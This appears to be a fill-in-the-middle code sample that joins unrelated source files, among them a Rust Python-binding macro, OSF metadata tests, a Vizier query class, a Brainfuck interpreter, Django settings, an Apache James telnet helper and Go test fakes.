[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
$name : [ $value_type ] => $setter_name,
]
}
}};
{ { $(#[doc=$doc:expr])* @property $visibility:vis def $name:ident(&$slf:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, $name(&$slf,) $res_type; { $($body)* } [] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
{ concat!($($doc, "\n"),*) } $name: $res_type,
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
]
}
}};
{ { @$name:ident.setter $visibility:vis def $setter_name:ident(&$slf:ident, $value:ident : Option<Option<&$value_type:ty>> ) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, $setter_name(&$slf,) $res_type; { $($body)* } [{ $value: Option<Option<&$value_type>> = {} }] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
$name : [ Option<&$value_type> ] => $setter_name,
]
}
}};
{ { @$name:ident.setter $visibility:vis def $setter_name:ident(&$slf:ident, $value:ident : Option<&$value_type:ty> ) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, $setter_name(&$slf,) $res_type; { $($body)* } [{ $value: Option<&$value_type> = {} }] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
$name : [ &$value_type ] => $setter_name,
]
}
}};
{ { @$name:ident.setter $visibility:vis def $setter_name:ident(&$slf:ident, $value:ident : Option<$value_type:ty> ) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, $setter_name(&$slf,) $res_type; { $($body)* } [{ $value: Option<$value_type> = {} }] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
$name : [ $value_type ] => $setter_name,
]
}
}};
}<|fim▁end|>
|
sdi_delitem: { $crate::py_class_binary_slot!($class::__delitem__, [&$key_name], $crate::_detail::libc::c_int, $crate::py_class::slots::UnitCallbackConverter) },
]
|
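For context, the macro arms above are the parser behind rust-cpython's py_class! macro: each `def __op__` arm routes a method into the matching CPython type slot (nb_inplace_subtract, sq_length, tp_new, tp_richcompare, and so on). The sketch below shows a minimal invocation those arms would expand; the class name Counter, its value field, and the method bodies are illustrative assumptions, not taken from the source.
#[macro_use] extern crate cpython;
use cpython::PyResult;
py_class!(class Counter |py| {
    data value: i64;
    // Matched by the __new__ arm, which fills the tp_new slot.
    def __new__(_cls, start: i64) -> PyResult<Counter> {
        Counter::create_instance(py, start)
    }
    // Matched by the __len__ arm (sq_length / mp_length slots).
    def __len__(&self) -> PyResult<usize> {
        Ok(*self.value(py) as usize)
    }
    // Matched by the __isub__ arm for a plain `$other_name:ty` argument
    // (nb_inplace_subtract); the returned value rebinds the target of `-=`.
    def __isub__(&self, other: i64) -> PyResult<i64> {
        Ok(*self.value(py) - other)
    }
});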
<|file_name|>trait-inheritance-call-bound-inherited.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
trait Foo { fn f(&self) -> int; }
trait Bar : Foo { fn g(&self) -> int; }
struct A { x: int }
impl Foo for A { fn f(&self) -> int { 10 } }
impl Bar for A { fn g(&self) -> int { 20 } }
// Call a function on Foo, given a T: Bar
fn gg<T:Bar>(a: &T) -> int {
a.f()
}
pub fn main() {<|fim▁hole|><|fim▁end|>
|
let a = &A { x: 3 };
assert!(gg(a) == 10);
}
|
<|file_name|>verify.js<|end_file_name|><|fim▁begin|>module.exports = function verify(check) {
    if (check === null || typeof check !== 'object') {
throw new Error('check is not an object');
}
var errors = [];
Object.keys(check).forEach(_verify, check);
if (errors.length > 0) {
        throw new Error('Health checks failed: ' + errors.join(', '));
}
return true;<|fim▁hole|> function _verify(key, i) {
if (this[key] === false || this[key] instanceof Error) {
errors.push(key);
}
else if (this[key] && typeof this[key] === 'object' && !Array.isArray(this[key])) {
Object.keys(this[key]).forEach(_verify, this[key]);
}
}
};<|fim▁end|>
| |
<|file_name|>test_file_metadata.py<|end_file_name|><|fim▁begin|>import json
import pytest
import jsonschema
from framework.auth.core import Auth
from framework.exceptions import PermissionsError
from website.settings import DOI_FORMAT, DATACITE_PREFIX
from website.project.licenses import set_license
from osf.models import FileMetadataSchema, NodeLicense, NodeLog
from osf_tests.factories import ProjectFactory, SubjectFactory, AuthUserFactory
from osf.utils.permissions import READ
from api_tests.utils import create_test_file
@pytest.fixture()
def node():
return ProjectFactory()
@pytest.fixture()
def osf_file(node):
return create_test_file(target=node, user=node.creator)
def inject_placeholder_doi(json_data):
    # The OSF cannot currently issue DOIs for a file, but a DOI is required for datacite schema validation.
# Manually add a placeholder in tests for validation until we handle this better.
placeholder = DOI_FORMAT.format(prefix=DATACITE_PREFIX, guid='placeholder')
json_data['identifier'] = {'identifierType': 'DOI', 'identifier': placeholder}
return json_data
@pytest.mark.django_db
class TestFileMetadataRecordSerializer:
def test_record_created_post_save(self, node, osf_file):
# check there's a record for every FileMetadataSchema
assert FileMetadataSchema.objects.count() > 0
assert osf_file.records.count() == FileMetadataSchema.objects.count()
for record in osf_file.records.all().select_related('file'):
assert record.file == osf_file
def test_serialize_record_datacite(self, node, osf_file):
# Test all of the parts of serialize_json that are auto-generated
# from relationships and properties on the node and file
# add a contributor with an ORCID
contributor = AuthUserFactory()
contributor.external_identity = {
'ORCID': {
'0000-0001-9143-4653': 'VERIFIED'
}
}
contributor.save()
node.add_contributor(contributor, save=False)
# add subjects, tags, license, and guid
tags = ['fish', 'scale']
        for tag in tags:
            osf_file.add_tag(tag, auth=Auth(node.creator), save=False)
bepress_subject = SubjectFactory(text='BePress Text')
new_subject = SubjectFactory(bepress_subject=bepress_subject)
node.subjects.add(new_subject)
no_license = NodeLicense.objects.get(name='CC0 1.0 Universal')
license_detail = {
'id': no_license.license_id,
'year': '2018',
'copyrightHolders': ['Woop', 'Yeah']
}
set_license(node, license_detail, Auth(node.creator))
osf_file.save()
node.save()
osf_file.target.reload()
record = osf_file.records.get(schema___id='datacite')
serialized_record = json.loads(record.serialize())
# test titles
titles = [title['title'] for title in serialized_record['titles']]
assert osf_file.name in titles
assert node.title in titles
# test dates
dates = [date['date'] for date in serialized_record['dates']]
assert str(osf_file.created) in dates
assert str(osf_file.modified) in dates
assert str(osf_file.created.year) == serialized_record['publicationYear']
# no resource type provided
assert serialized_record['resourceType']['resourceType'] == '(:unas)'
assert serialized_record['resourceType']['resourceTypeGeneral'] == 'Other'
# guid in alternate identifiers
file_guid = osf_file.guids.first()._id
alternate_identifier = serialized_record['alternateIdentifiers'][0]
assert file_guid in alternate_identifier['alternateIdentifier']
# check for tags and subjects
subjects_in_record = [sub['subject'] for sub in serialized_record['subjects']]
assert bepress_subject.text in subjects_in_record
for tag in tags:
assert tag in subjects_in_record
# node license
rights = serialized_record['rightsList'][0]
assert rights['rights'] == no_license.name
assert rights['rightsURI'] == no_license.url
# test most recent version
assert serialized_record['version'] == osf_file.versions.first().identifier
def test_validate(self, node, osf_file):
record = osf_file.records.get(schema___id='datacite')
json_data = json.loads(record.serialize())
assert jsonschema.validate(
inject_placeholder_doi(json_data),
record.schema.schema
) is None
@pytest.mark.django_db
class TestFileMetadataRecord:
@pytest.fixture()
def initial_metadata(self):
return {
'file_description': 'Hello this is a description',
'resource_type': 'Book',
'related_publication_doi': '10.123/fkosf/hello'
}
@pytest.fixture()
def record(self, osf_file):
return osf_file.records.first()
def test_update_record(self, node, record, initial_metadata):
record.metadata = initial_metadata
record.save()
partial_metadata = {
'funders': [
{'funding_agency': 'Hello'},
{'funding_agency': 'Ric Flair', 'grant_number': 'Woooooo'},
]
}
record.update(partial_metadata, user=node.creator)
# Make sure an update creates a node log
assert node.logs.latest().action == NodeLog.FILE_METADATA_UPDATED
# Make sure old fields are cleared
        assert all(key not in record.metadata for key in initial_metadata)
full_metadata = {
'funders': [
{'funding_agency': 'Hello'},
{'funding_agency': 'Ric Flair', 'grant_number': 'Woooooo'},
],
'file_description': 'Hey this is a great interesting important file',
'resource_type': 'Funding Submission',
'related_publication_doi': '10.12345/fk2osf.io/hello/'
}
record.update(full_metadata, user=node.creator)
json_data = json.loads(record.serialize())
datacite_user_entered_fields = ['fundingReferences', 'resourceType', 'descriptions', 'relatedIdentifiers']
for field in datacite_user_entered_fields:
assert field in json_data.keys()
<|fim▁hole|> ) is None
def test_update_fails_with_incorrect_metadata(self, node, record):
# metadata not in schema fails
wrong_metadata = {
'favorite_schema': 'crossref'
}
with pytest.raises(jsonschema.ValidationError):
record.update(wrong_metadata, user=node.creator)
record.reload()
assert record.metadata == {}
assert node.logs.latest().action != NodeLog.FILE_METADATA_UPDATED
# metadata not matching schema pattern fails
wrong_doi = {
'related_publication_doi': 'whatever'
}
with pytest.raises(jsonschema.ValidationError):
record.update(wrong_doi, user=node.creator)
# resource_type not in specified options fails
wrong_resource_type = {
'resource_type': 'Scrap Book'
}
with pytest.raises(jsonschema.ValidationError):
record.update(wrong_resource_type, user=node.creator)
# funders but no funding agency
no_funding_agency_metadata = {
'funders': [
{'grant_number': 'Woooo'}
]
}
with pytest.raises(jsonschema.ValidationError):
record.update(no_funding_agency_metadata, user=node.creator)
# additional properties for funders fails
more_funders_metadata = {
'funders': [
{'funding_agency': 'Woop', 'there_it': 'is'}
]
}
with pytest.raises(jsonschema.ValidationError):
record.update(more_funders_metadata, user=node.creator)
def test_update_permissions(self, node, record, initial_metadata):
# Can't update with non-contributor auth
rando = AuthUserFactory()
with pytest.raises(PermissionsError):
record.update(initial_metadata, user=rando)
# Can't update with read-only auth
read_contrib = AuthUserFactory()
node.add_contributor(read_contrib, permissions=READ)
node.save()
with pytest.raises(PermissionsError):
record.update(initial_metadata, user=read_contrib)
# Can't update with no auth
with pytest.raises(PermissionsError):
record.update(initial_metadata, user=None)
def test_forked_file_has_metadata_copied(self, node, record, initial_metadata):
record.metadata = initial_metadata
record.save()
fork = node.fork_node(auth=Auth(node.creator))
forked_record = fork.files.first().records.first()
assert forked_record.metadata == record.metadata<|fim▁end|>
|
# validate record with all user entered metadata
assert jsonschema.validate(
inject_placeholder_doi(json_data),
record.schema.schema
|
<|file_name|>util.rs<|end_file_name|><|fim▁begin|>use std::io::{self, Result, Read, Write, ErrorKind};
/// Copies from `r` to `w`, transferring at most `len_max` bytes.
pub fn copy<R: Read, W: Write>(r: &mut R, w: &mut W, len_max: u64) -> io::Result<u64> {
let mut buf = [0; 1024];
let mut written : u64 = 0;
while written < len_max {
let len = match r.read(&mut buf) {
Ok(0) => return Ok(written),
Ok(len) => len,
Err(ref e) if e.kind() == ErrorKind::Interrupted => continue,<|fim▁hole|> try!(w.write_all(&buf[..len]));
written += len as u64;
}
else {
let to_write : usize = len_max as usize - written as usize;
            let to_write = if to_write > len { len } else { to_write }; // clamp is redundant here (to_write <= len in this branch) but harmless
try!(w.write_all(&buf[..to_write]));
written += to_write as u64;
}
}
Ok(written)
}<|fim▁end|>
|
Err(e) => return Err(e),
};
if (written+len as u64) < len_max {
|
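// A hedged usage sketch for `copy` (illustrative, not from the original
// crate): caps an in-memory transfer at three bytes via `std::io::Cursor`.
#[cfg(test)]
mod copy_tests {
    use super::copy;
    use std::io::Cursor;

    #[test]
    fn stops_at_len_max() {
        let mut src = Cursor::new(vec![1u8, 2, 3, 4, 5]);
        let mut dst = Vec::new();
        // Only the first three bytes may reach `dst`.
        assert_eq!(copy(&mut src, &mut dst, 3).unwrap(), 3);
        assert_eq!(dst, vec![1, 2, 3]);
    }
}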
<|file_name|>vizquery.py<|end_file_name|><|fim▁begin|>from chimera.util.votable import VOTable
from httplib import HTTPConnection
import tempfile
import os
import urllib
class VizQuery(object):
"""
Queries A catalog in Vizier
within a given radius or box of the zenith
"""
def __init__(self):
self.args = {}
self.args["-mime"] = "xml"
self.columns = None
def useCat(self, catName):
"""
@param catName: the catalog's name in Vizier
@type catName: str
Simply sets the catalog's name
"""
self.args["-source"] = catName
def useColumns(self, columns, sortBy, reverse=False):
"""
@param columns: list of catalog's columns to use
@type columns: list
@param sortBy: define which column to sort by
@type sortBy: str
        @param reverse: decide to reverse sort
        @type reverse: bool
Define which columns will be fetched and which column will be used
for sorting.
"""
self.columns = columns.split(",")
self.args["-out"] = columns
if reverse:
self.args["-sort"] = "-" + sortBy
else:
self.args["-sort"] = sortBy
def sortBy(self, column):
"""
One sets here which column to sort by
@param column: name of column to sort by
@type column: str
"""
def constrainColumns(self, columns):
"""
Use this to add constraints to any of the columns
@param columns: list of dictionaries {COLUMN:condition}
@type columns: list
"""
self.args.update(columns)
def useTarget(self, center, radius=None, box=None):
"""
@param center: center of search in catalog
@type center: L{Position}
@param radius: radius of search
@type radius: float
@param box: box size, if you want a square use an integer
if you want a rectangle use a tuple (ww,hh)
@type box: int | tuple
"""
self.args["-c"] = str(center)
self.args["-c.eq"] = "J2000"
if radius:
self.args["-c.rd"] = radius
elif box:
            try:
                self.args["-c.bd"] = "=%fx%f" % box
            except TypeError:
                self.args["-c.bd"] = box
else:
raise TypeError("You must specify either radius or box size")
def find(self, limit=9999):
"""
@param limit: Number of stars to return from Vizier
@type limit: int
"""
assert "-c.rd" in self.args or "-c.bd" in self.args, "No target selected, use useTarget method first."
self.args["-out.max"] = limit
results = tempfile.NamedTemporaryFile(mode='w+',
prefix="chimera.vizquery",
dir=tempfile.gettempdir())
# query the catalog in Vizier's database
conn = HTTPConnection("webviz.u-strasbg.fr")
s = urllib.urlencode(self.args)
conn.request("POST", "/viz-bin/votable", s)
resp = conn.getresponse()
ret = resp.read()
f = open(results.name, "w")
f.write(ret)<|fim▁hole|>
votable = VOTable(results.name)
for linha in votable.getDataRows():
v = [c.getContent() for c in linha.getNodeList()]
obj.append(dict(zip(self.columns, v)))
return obj<|fim▁end|>
|
f.close()
obj = []
|
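# A hedged usage sketch for VizQuery (illustrative values throughout): the
# catalog, columns, coordinates and radius below are examples only, and a
# pre-formatted "RA DEC" string stands in for the L{Position} object the
# docstring expects, since both reach Vizier through str().
if __name__ == '__main__':
    q = VizQuery()
    q.useCat("UCAC2")
    q.useColumns("UCAC2,RAJ2000,DEJ2000,UCmag", sortBy="UCmag")
    q.useTarget("14:00:00 -30:00:00", radius=0.5)
    for star in q.find(limit=10):
        print star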
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>use std::fs;
use std::io;
use std::io::Read;
use clap::{App, Arg};
mod llvm_runner;
mod optimizer;
mod parser;
mod runner;
mod structs;
#[cfg(feature = "llvm")]
use llvm_runner::LlvmState;
use parser::parse;
use runner::State;
use structs::OpStream;
fn main() {
let app = App::new("BrainRust")
.arg(
Arg::with_name("dry-run")
.short("n")
.long("dry-run")
.help("Don't actually execute the program"),
)
.arg(
Arg::with_name("no-optimize")
.short("0")
.long("no-optimize")
.help("Don't optimize before running"),
)
.arg(Arg::with_name("FILES").min_values(1).required(true));
<|fim▁hole|> .long("llvm")
.help("Execute using LLVM JIT"),
);
let matches = app.get_matches();
    let dry_run = matches.is_present("dry-run");
let no_optimize = matches.is_present("no-optimize");
let use_llvm = cfg!(feature = "llvm") && matches.is_present("llvm");
for filename in matches.values_of("FILES").unwrap() {
let buffer = match read_file(filename) {
Ok(v) => v,
Err(e) => {
eprintln!("Error while reading {}: {}", filename, e);
continue;
}
};
let ops = match parse(&buffer) {
Ok(v) => v,
Err(e) => {
eprintln!("Error while parsing {}: {}", filename, e);
continue;
}
};
let mut opstream = OpStream { ops };
if !(use_llvm || no_optimize) {
opstream.optimize();
}
if !dry_run {
if use_llvm {
#[cfg(feature = "llvm")]
LlvmState::new(&mut io::stdin(), &mut io::stdout(), !no_optimize)
.run(opstream.get());
} else {
State::new(&mut io::stdin(), &mut io::stdout()).run(opstream.get());
};
}
}
}
fn read_file(filename: &str) -> Result<Vec<u8>, io::Error> {
let mut buffer = Vec::new();
fs::File::open(filename)?.read_to_end(&mut buffer)?;
Ok(buffer)
}<|fim▁end|>
|
#[cfg(feature = "llvm")]
let app = app.arg(
Arg::with_name("llvm")
.short("l")
|
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
readme = f.read()
requirements = [
'prov>=1.5.3',
]
test_requirements = [
'pydot>=1.2.0'
]
setup(
name='voprov',
version='0.0.2',
description='A library for IVOA Provenance Data Model supporting PROV-JSON, '
'PROV-XML and PROV-N',
long_description=readme,
author='Jean-Francois Sornay',
author_email='[email protected]',
url='https://github.com/sanguillon/voprov/',
packages=find_packages(),
include_package_data=True,
install_requires=requirements,
extras_require={
'dot': ['pydot>=1.2.0'],
},
license="MIT",
zip_safe=False,
keywords=[
'provenance', 'graph', 'model', 'VOPROV', 'provenance-dm', 'PROVENANCE-DM', 'PROV-JSON', 'JSON',
'PROV-XML', 'PROV-N'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',<|fim▁hole|> 'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Scientific/Engineering :: Information Analysis',
],
tests_require=test_requirements,
python_requires='>=2',
)<|fim▁end|>
|
'License :: OSI Approved :: MIT License',
'Natural Language :: French',
|
<|file_name|>settings.py<|end_file_name|><|fim▁begin|>"""
Django settings for ghost_project project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '#r@x_l8*u-tnrtc@er=1-z9ng7an7c%@#bue8cnsdn3ogud79)'
# SECURITY WARNING: don't run with debug turned on in production!
ALLOWED_HOSTS = ('localhost', '127.0.0.1')
DEBUG = True
TEMPLATE_DEBUG = True
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'feedbacks',
'users',
'utils',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',<|fim▁hole|>)
ROOT_URLCONF = 'default.urls'
WSGI_APPLICATION = 'default.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
'USER': 'ghost',
'PASSWORD': 'geekattitude',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'CET'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/assets/'
# templates and files
TEMPLATE_DIRS = ('assets/tpl',)
STATICFILES_DIRS = (os.path.abspath(os.path.join(BASE_DIR, 'assets')),)
# others
APPEND_SLASH = True<|fim▁end|>
|
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
|
<|file_name|>james.py<|end_file_name|><|fim▁begin|>from telnetlib import Telnet
class James:
def __init__(self, app):
self.app = app
def ensure_user_exists(self, username, password):
james_config = self.app.config['james']
session = James.Session(james_config['host'], james_config['port'], james_config['username'], james_config['password'])
if session.is_user_registered(username):
session.reset_password(username, password)
else:
session.create_user(username, password)
session.quit()<|fim▁hole|>
class Session:
def __init__(self, host, port, username, password):
self.telnet = Telnet(host, port, 10)
self.read_until("login id:")
self.write(username + '\n')
self.read_until("Password:")
self.write(password + '\n')
self.read_until("Welcome root. HELP for a list of commands")
def is_user_registered(self, username):
self.write("verify %s\n" % username)
res = self.telnet.expect([b"exists", b"does not exist"])
return res[0] == 0
def create_user(self, username, password):
self.write("adduser %s %s\n" % (username, password))
self.read_until("User %s added" % username)
def reset_password(self, username, password):
self.write("setpassword %s %s\n" % (username, password))
self.read_until("Password for %s reset" % username)
def quit(self):
self.write("quit\n")
def read_until(self, text):
self.telnet.read_until(text.encode("ascii"), 5)
def write(self, text):
self.telnet.write(text.encode("ascii"))<|fim▁end|>
| |
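# A hedged usage sketch for James: the stub app and the host/port/credentials
# are illustrative defaults for a local Apache James remote manager, not
# values taken from this codebase.
if __name__ == '__main__':
    class StubApp(object):
        config = {'james': {'host': 'localhost', 'port': 4555,
                            'username': 'root', 'password': 'root'}}

    James(StubApp()).ensure_user_exists('alice', 's3cret')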
<|file_name|>fakeenv_test.go<|end_file_name|><|fim▁begin|>// Copyright 2014 Canonical Ltd.
// Licensed under the AGPLv3, see LICENCE file for details.
package model_test
import (
"errors"
gc "gopkg.in/check.v1"
"gopkg.in/juju/names.v2"
"github.com/juju/juju/api"
jujucloud "github.com/juju/juju/cloud"
"github.com/juju/juju/environs/config"
"github.com/juju/juju/testing"
)
// ModelConfig related fake environment for testing.
type fakeEnvSuite struct {
testing.FakeJujuXDGDataHomeSuite
fake *fakeEnvAPI
}
func (s *fakeEnvSuite) SetUpTest(c *gc.C) {
s.FakeJujuXDGDataHomeSuite.SetUpTest(c)
s.fake = &fakeEnvAPI{
values: map[string]interface{}{
"name": "test-model",
"special": "special value",
"running": true,
},
defaults: config.ConfigValues{
"attr": {Value: "foo", Source: "default"},
"attr2": {Value: "bar", Source: "controller"},
"attr3": {Value: "baz", Source: "region"},
},
}
}
type fakeEnvAPI struct {
values map[string]interface{}
cloud, region string
defaults config.ConfigValues
err error
keys []string
resetKeys []string
}
func (f *fakeEnvAPI) Close() error {
return nil
}
func (f *fakeEnvAPI) ModelGet() (map[string]interface{}, error) {
return f.values, nil
}
func (f *fakeEnvAPI) ModelGetWithMetadata() (config.ConfigValues, error) {
result := make(config.ConfigValues)
for name, val := range f.values {
result[name] = config.ConfigValue{Value: val, Source: "model"}
}
return result, nil
}
func (f *fakeEnvAPI) ModelSet(config map[string]interface{}) error {
f.values = config
return f.err
}
func (f *fakeEnvAPI) ModelUnset(keys ...string) error {
f.resetKeys = keys
return f.err
}
// ModelDefaults related fake environment for testing.
type fakeModelDefaultEnvSuite struct {
testing.FakeJujuXDGDataHomeSuite
fakeAPIRoot *fakeAPIConnection
fakeDefaultsAPI *fakeModelDefaultsAPI
fakeCloudAPI *fakeCloudAPI
}
func (s *fakeModelDefaultEnvSuite) SetUpTest(c *gc.C) {
s.FakeJujuXDGDataHomeSuite.SetUpTest(c)
s.fakeAPIRoot = &fakeAPIConnection{}
s.fakeDefaultsAPI = &fakeModelDefaultsAPI{
values: map[string]interface{}{
"name": "test-model",
"special": "special value",
"running": true,
},
defaults: config.ModelDefaultAttributes{
"attr": {Default: "foo"},
"attr2": {
Controller: "bar",
Regions: []config.RegionDefaultValue{{
"dummy-region",
"dummy-value",
}, {
"another-region",
"another-value",
}}},
},
}
s.fakeCloudAPI = &fakeCloudAPI{
clouds: map[string]jujucloud.Cloud{
"cloud-dummy": {
Type: "dummy-cloud",
Regions: []jujucloud.Region{
{Name: "dummy-region"},
{Name: "another-region"},
},
},
},
}
}
type fakeAPIConnection struct {<|fim▁hole|>
func (*fakeAPIConnection) Close() error {
return nil
}
type fakeModelDefaultsAPI struct {
values map[string]interface{}
cloud, region string
defaults config.ModelDefaultAttributes
err error
keys []string
}
func (f *fakeModelDefaultsAPI) Close() error {
return nil
}
func (f *fakeModelDefaultsAPI) ModelGet() (map[string]interface{}, error) {
return f.values, nil
}
func (f *fakeModelDefaultsAPI) ModelDefaults() (config.ModelDefaultAttributes, error) {
return f.defaults, nil
}
func (f *fakeModelDefaultsAPI) SetModelDefaults(cloud, region string, cfg map[string]interface{}) error {
if f.err != nil {
return f.err
}
f.cloud = cloud
f.region = region
for name, val := range cfg {
f.defaults[name] = config.AttributeDefaultValues{Controller: val}
}
return nil
}
func (f *fakeModelDefaultsAPI) UnsetModelDefaults(cloud, region string, keys ...string) error {
if f.err != nil {
return f.err
}
f.cloud = cloud
f.region = region
for _, key := range keys {
delete(f.defaults, key)
}
return nil
}
func (f *fakeModelDefaultsAPI) ModelSet(config map[string]interface{}) error {
f.values = config
return f.err
}
func (f *fakeModelDefaultsAPI) ModelUnset(keys ...string) error {
f.keys = keys
return f.err
}
type fakeCloudAPI struct {
clouds map[string]jujucloud.Cloud
}
func (f *fakeCloudAPI) Close() error { return nil }
func (f *fakeCloudAPI) DefaultCloud() (names.CloudTag, error) {
return names.NewCloudTag("dummy"), nil
}
func (f *fakeCloudAPI) Cloud(name names.CloudTag) (jujucloud.Cloud, error) {
var (
c jujucloud.Cloud
ok bool
)
if c, ok = f.clouds[name.String()]; !ok {
return jujucloud.Cloud{}, errors.New("Unknown cloud")
}
return c, nil
}<|fim▁end|>
|
api.Connection
}
|
<|file_name|>el.js<|end_file_name|><|fim▁begin|>/*
Load a block from github.io.
Accepts a URL as a parameter, which may include query parameters, e.g. https://megjlow.github.io/extension2.js?name=SUN&ip=10.0.0.1
*/
new (function() {
var ext = this;
var descriptor = {
blocks: [
[' ', 'Load extension block ip %s', 'loadBlock', 'ip', 'ip'],
            [' ', 'Load extension block name %s', 'loadBlockName', 'name', 'name'],
],
url: 'http://www.warwick.ac.uk/tilesfortales'
};
ext._shutdown = function() {};
ext._getStatus = function() {
return {status: 2, msg: 'Device connected'}
};
ext.loadBlock = function(ip) {
ScratchExtensions.loadExternalJS("https://megjlow.github.io/socket.js?ip=" + ip);
};
ext.loadBlockName = function(name) {
ScratchExtensions.loadExternalJS("https://megjlow.github.io/socket.js?name=" + name);
};
ScratchExtensions.register("extensionloader", descriptor, ext);
<|fim▁hole|><|fim▁end|>
|
});
|
<|file_name|>transaction.component.js<|end_file_name|><|fim▁begin|>"use strict";
var __decorate = (this && this.__decorate) || function (decorators, target, key, desc) {
var c = arguments.length, r = c < 3 ? target : desc === null ? desc = Object.getOwnPropertyDescriptor(target, key) : desc, d;
if (typeof Reflect === "object" && typeof Reflect.decorate === "function") r = Reflect.decorate(decorators, target, key, desc);
else for (var i = decorators.length - 1; i >= 0; i--) if (d = decorators[i]) r = (c < 3 ? d(r) : c > 3 ? d(target, key, r) : d(target, key)) || r;
return c > 3 && r && Object.defineProperty(target, key, r), r;
};
var __metadata = (this && this.__metadata) || function (k, v) {
if (typeof Reflect === "object" && typeof Reflect.metadata === "function") return Reflect.metadata(k, v);
};
var core_1 = require('@angular/core');
var helper_service_1 = require('../../services/helper/helper.service');
var transaction_service_1 = require('../../services/transaction/transaction.service');
var router_deprecated_1 = require('@angular/router-deprecated');
var GetEntity_service_1 = require('../../services/GetEntity/GetEntity.service');
var transactionline_component_1 = require('../transactionline/transactionline.component');
var main_1 = require('ag-grid-ng2/main');
var TransactionComponent = (function () {
function TransactionComponent(transactionService, router) {
var _this = this;
this.transactionService = transactionService;
this.router = router;
this.getTransactionSuccess = true;
this.ok = new core_1.EventEmitter();
this.transaction = {
comment: '',
debtorID: -1,
entityID: -1,
transactionID: -1,
transactionLineArray: [],
bankAccountID: -1,
chequeNumber: -1,
